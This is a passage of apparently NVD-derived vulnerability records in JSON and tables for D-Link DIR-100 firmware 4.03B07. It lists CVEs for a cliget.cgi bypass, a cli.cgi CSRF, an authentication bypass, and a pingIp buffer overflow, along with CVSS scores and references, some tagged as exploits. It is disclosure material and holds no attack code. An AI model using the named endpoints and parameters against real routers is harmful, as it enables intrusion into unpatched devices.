"matchCriteriaId": "8D1E6935-5331-437A-8768-62CEE0052CB4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "944231AD-3DB5-432F-826F-DF40D3538F86",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script"
},
{
"lang": "es",
"value": "D-Link DIR-100 versi\u00f3n 4.03B07: una omisi\u00f3n de seguridad por medio de un error en el script cliget.cgi"
}
],
"id": "CVE-2013-7052",
"lastModified": "2024-11-21T02:00:14.637",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-02-04T14:15:11.403",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"source": "cve@mitre.org",
"tags": [
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.securityfocus.com/bid/65290"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90902"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.securityfocus.com/bid/65290"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-522"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-02-04 14:15
Modified
2024-11-21 02:00
Severity ?
Summary
D-Link DIR-100 4.03B07: cli.cgi CSRF
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | Exploit, Third Party Advisory | |
| cve@mitre.org | https://exchange.xforce.ibmcloud.com/vulnerabilities/90905 | Third Party Advisory, VDB Entry | |
| cve@mitre.org | https://www.securityfocus.com/bid/65290/info | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://exchange.xforce.ibmcloud.com/vulnerabilities/90905 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.securityfocus.com/bid/65290/info | Third Party Advisory, VDB Entry |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-100_firmware | 4.03b07 | |
| dlink | dir-100 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-100_firmware:4.03b07:*:*:*:*:*:*:*",
"matchCriteriaId": "8D1E6935-5331-437A-8768-62CEE0052CB4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "944231AD-3DB5-432F-826F-DF40D3538F86",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-100 4.03B07: cli.cgi CSRF"
},
{
"lang": "es",
"value": "D-Link DIR-100 versi\u00f3n 4.03B07: vulnerabilidad de tipo CSRF del archivo cli.cgi."
}
],
"id": "CVE-2013-7053",
"lastModified": "2024-11-21T02:00:14.800",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-02-04T14:15:11.777",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90905"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.securityfocus.com/bid/65290/info"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90905"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.securityfocus.com/bid/65290/info"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-352"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-02-04 14:15
Modified
2024-11-21 02:00
Severity ?
Summary
D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | Exploit, Third Party Advisory | |
| cve@mitre.org | http://www.exploit-db.com/exploits/31425 | Third Party Advisory, VDB Entry | |
| cve@mitre.org | https://exchange.xforce.ibmcloud.com/vulnerabilities/90904 | VDB Entry | |
| cve@mitre.org | https://www.securityfocus.com/bid/65290 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.exploit-db.com/exploits/31425 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://exchange.xforce.ibmcloud.com/vulnerabilities/90904 | VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.securityfocus.com/bid/65290 | Third Party Advisory, VDB Entry |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dir-100_firmware | 4.03b07 | |
| dlink | dir-100 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dir-100_firmware:4.03b07:*:*:*:*:*:*:*",
"matchCriteriaId": "8D1E6935-5331-437A-8768-62CEE0052CB4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "944231AD-3DB5-432F-826F-DF40D3538F86",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters"
},
{
"lang": "es",
"value": "D-Link DIR-100 versi\u00f3n 4.03B07: una omisi\u00f3n de seguridad del archivo cli.cgi debido a un fallo al comprobar los par\u00e1metros de autenticaci\u00f3n."
}
],
"id": "CVE-2013-7051",
"lastModified": "2024-11-21T02:00:14.493",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-02-04T14:15:11.323",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/31425"
},
{
"source": "cve@mitre.org",
"tags": [
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90904"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.securityfocus.com/bid/65290"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/31425"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90904"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.securityfocus.com/bid/65290"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-10-19 10:36
Modified
2024-11-21 01:58
Severity ?
Summary
Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cret@cert.org | http://pastebin.com/raw.php?i=vbiG42VD | Exploit | |
| cret@cert.org | http://www.kb.cert.org/vuls/id/248083 | US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | http://pastebin.com/raw.php?i=vbiG42VD | Exploit | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.kb.cert.org/vuls/id/248083 | US Government Resource |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dir-100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "944231AD-3DB5-432F-826F-DF40D3538F86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi."
},
{
"lang": "es",
"value": "Desbordamiento de pila en la funci\u00f3n RuntimeDiagnosticPing en /bin/webs en routers D-Link DIR-100 podr\u00eda permitir a administradores autenticados remotamente ejecutar comandos de forma arbitraria a trav\u00e9s de un par\u00e1metro largo set/runtime/diagnostic/pingIp a Tools/tools_misc.xgi."
}
],
"id": "CVE-2013-6027",
"lastModified": "2024-11-21T01:58:38.873",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-10-19T10:36:09.180",
"references": [
{
"source": "cret@cert.org",
"tags": [
"Exploit"
],
"url": "http://pastebin.com/raw.php?i=vbiG42VD"
},
{
"source": "cret@cert.org",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/248083"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://pastebin.com/raw.php?i=vbiG42VD"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/248083"
}
],
"sourceIdentifier": "cret@cert.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}